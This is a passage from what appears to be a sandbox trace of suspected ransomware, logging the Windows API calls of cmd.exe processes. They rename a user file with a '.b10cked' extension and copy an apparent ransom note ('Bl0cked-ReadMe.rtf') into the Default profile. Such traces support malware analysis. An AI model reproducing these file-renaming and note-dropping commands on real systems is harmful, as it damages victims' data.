lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef7dc | out: lpFindFileData=0x1ef7dc) returned 0x3b0028 [0215.553] FindClose (in: hFindFile=0x3b0028 | out: hFindFile=0x3b0028) returned 1 [0215.553] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef7dc | out: lpFindFileData=0x1ef7dc) returned 0x3b0028 [0215.553] FindClose (in: hFindFile=0x3b0028 | out: hFindFile=0x3b0028) returned 1 [0215.553] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.553] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0215.553] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0215.553] GetEnvironmentStringsW () returned 0x3b2b08* [0215.553] FreeEnvironmentStringsW (penv=0x3b2b08) returned 1 [0215.553] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.554] GetConsoleOutputCP () returned 0x1b5 [0215.554] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.554] GetUserDefaultLCID () returned 0x409 [0215.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0215.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efba0, cchData=128 | out: lpLCData="0") returned 2 [0215.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efba0, cchData=128 | out: lpLCData="0") returned 2 [0215.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efba0, cchData=128 | out: lpLCData="1") returned 2 [0215.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0215.554] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0215.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0215.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0215.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0215.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0215.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0215.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0215.555] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0215.555] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0215.555] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0215.555] GetConsoleTitleW (in: lpConsoleTitle=0x3a08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.556] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.556] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0215.556] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0215.556] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0215.556] _wcsicmp (_String1="move", _String2=")") returned 68 [0215.556] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0215.556] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0215.556] _wcsicmp (_String1="IF", _String2="move") returned -4 [0215.557] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0215.557] _wcsicmp (_String1="REM", _String2="move") returned 5 [0215.557] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0215.559] GetConsoleTitleW (in: lpConsoleTitle=0x1ef898, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.559] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0215.559] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0215.559] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0215.559] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0215.559] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0215.559] _wcsicmp (_String1="move", _String2="CD") returned 10 [0215.559] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0215.559] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0215.559] _wcsicmp (_String1="move", _String2="REN") returned -5 [0215.559] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0215.559] _wcsicmp (_String1="move", _String2="SET") returned -6 [0215.559] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0215.560] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0215.560] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0215.560] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0215.560] _wcsicmp (_String1="move", _String2="MD") returned 11 [0215.560] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0215.560] _wcsicmp (_String1="move", _String2="RD") returned -5 [0215.560] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0215.560] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0215.560] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0215.560] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0215.560] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0215.560] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0215.560] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0215.560] _wcsicmp (_String1="move", _String2="VER") returned -9 [0215.560] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0215.560] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0215.560] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0215.560] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0215.560] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0215.560] _wcsicmp (_String1="move", _String2="START") returned -6 [0215.560] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0215.560] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0215.560] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0215.561] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.561] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.561] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef654, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef64c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef64c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0215.562] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0215.563] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0215.563] _wcsicmp (_String1="MSNBCN~1.URL", _String2=".") returned 63 [0215.563] _wcsicmp (_String1="MSNBCN~1.URL", _String2="..") returned 63 [0215.563] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnbcn~1.url")) returned 0x20 [0215.563] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3b1e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.563] SetErrorMode (uMode=0x0) returned 0x0 [0215.563] SetErrorMode (uMode=0x1) returned 0x0 [0215.563] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL", nBufferLength=0x104, lpBuffer=0x1eefdc, lpFilePart=0x1eefc4 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL", lpFilePart=0x1eefc4*="MSNBCN~1.URL") returned 0x2f [0215.563] SetErrorMode (uMode=0x0) returned 0x1 [0215.563] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1" (normalized: "c:\\users\\default\\favori~1\\msnweb~1")) returned 0x12 [0215.563] _wcsicmp (_String1="MSNBCN~1.URL", _String2=".") returned 63 [0215.563] _wcsicmp (_String1="MSNBCN~1.URL", _String2="..") returned 63 [0215.563] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnbcn~1.url")) returned 0x20 [0215.564] SetErrorMode (uMode=0x0) returned 0x0 [0215.564] SetErrorMode (uMode=0x1) returned 0x0 [0215.564] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL", nBufferLength=0x104, lpBuffer=0x1ef458, lpFilePart=0x1ef1f0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL", lpFilePart=0x1ef1f0*="MSNBCN~1.URL") returned 0x2f [0215.564] SetErrorMode (uMode=0x0) returned 0x1 [0215.564] SetErrorMode (uMode=0x0) returned 0x0 [0215.564] SetErrorMode (uMode=0x1) returned 0x0 [0215.564] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked", nBufferLength=0x104, lpBuffer=0x1ef660, lpFilePart=0x1ef1f0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked", lpFilePart=0x1ef1f0*="MSNBC News.url.b10cked") returned 0x39 [0215.564] SetErrorMode (uMode=0x0) returned 0x1 [0215.564] SetLastError (dwErrCode=0x0) [0215.564] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnbc news.url.b10cked")) returned 0xffffffff [0215.564] GetLastError () returned 0x2 [0215.564] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL", fInfoLevelId=0x1, lpFindFileData=0x1eeb6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eeb6c) returned 0x3a0eb0 [0215.564] FindNextFileW (in: hFindFile=0x3a0eb0, lpFindFileData=0x1eeb6c | out: lpFindFileData=0x1eeb6c) returned 0 [0215.565] GetLastError () returned 0x12 [0215.565] FindClose (in: hFindFile=0x3a0eb0 | out: hFindFile=0x3a0eb0) returned 1 [0215.565] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL", fInfoLevelId=0x1, lpFindFileData=0x3b1c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3b1c08) returned 0x3a0eb0 [0215.566] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked", nBufferLength=0x104, lpBuffer=0x1eee04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked", lpFilePart=0x0) returned 0x39 [0215.566] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url", nBufferLength=0x104, lpBuffer=0x1eee04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url", lpFilePart=0x0) returned 0x31 [0215.566] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnbc news.url")) returned 0x20 [0215.566] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnbc news.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnbc news.url.b10cked"), dwFlags=0x3) returned 1 [0215.566] FindClose (in: hFindFile=0x3a0eb0 | out: hFindFile=0x3a0eb0) returned 1 [0215.566] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1eedb8 | out: _Buffer=" 1") returned 9 [0215.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.566] GetFileType (hFile=0x7) returned 0x2 [0215.600] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0215.600] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eed44 | out: lpMode=0x1eed44) returned 1 [0215.600] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.600] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eed78 | out: lpConsoleScreenBufferInfo=0x1eed78) returned 1 [0215.600] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0215.600] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eedb8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0215.600] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1eed9c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eed9c*=0x1a) returned 1 [0215.600] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.601] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.601] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.601] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.601] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.601] SetConsoleInputExeNameW () returned 0x1 [0215.601] GetConsoleOutputCP () returned 0x1b5 [0215.601] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.601] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.601] exit (_Code=0) Process: id = "541" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xbbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31858 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31859 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31860 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31861 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 31862 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31863 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31864 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31865 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31866 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 31867 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31998 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31999 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32000 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 32001 start_va = 0x2f0000 end_va = 0x356fff entry_point = 0x2f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32002 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32003 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32004 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32005 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32006 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32007 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32008 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32009 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32010 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32011 start_va = 0x70000 end_va = 0x7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 32012 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 32013 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32014 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32015 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 32016 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 32017 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 32018 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 32019 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 32020 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 32021 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 743 os_tid = 0xb74 [0215.695] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f96c | out: lpSystemTimeAsFileTime=0x18f96c*(dwLowDateTime=0xb55ea360, dwHighDateTime=0x1d440a9)) [0215.695] GetCurrentProcessId () returned 0xbbc [0215.695] GetCurrentThreadId () returned 0xb74 [0215.695] GetTickCount () returned 0x3c5dd [0215.695] QueryPerformanceCounter (in: lpPerformanceCount=0x18f964 | out: lpPerformanceCount=0x18f964*=27248427742) returned 1 [0215.696] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0215.696] __set_app_type (_Type=0x1) [0215.696] __p__fmode () returned 0x76b331f4 [0215.696] __p__commode () returned 0x76b331fc [0215.696] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0215.696] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0215.696] GetCurrentThreadId () returned 0xb74 [0215.696] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb74) returned 0x38 [0215.696] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.696] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0215.696] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.696] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.696] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f8fc | out: phkResult=0x18f8fc*=0x0) returned 0x2 [0215.696] VirtualQuery (in: lpAddress=0x18f933, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.696] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0215.697] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0215.697] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.697] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.697] GetConsoleOutputCP () returned 0x1b5 [0215.697] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.697] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0215.697] 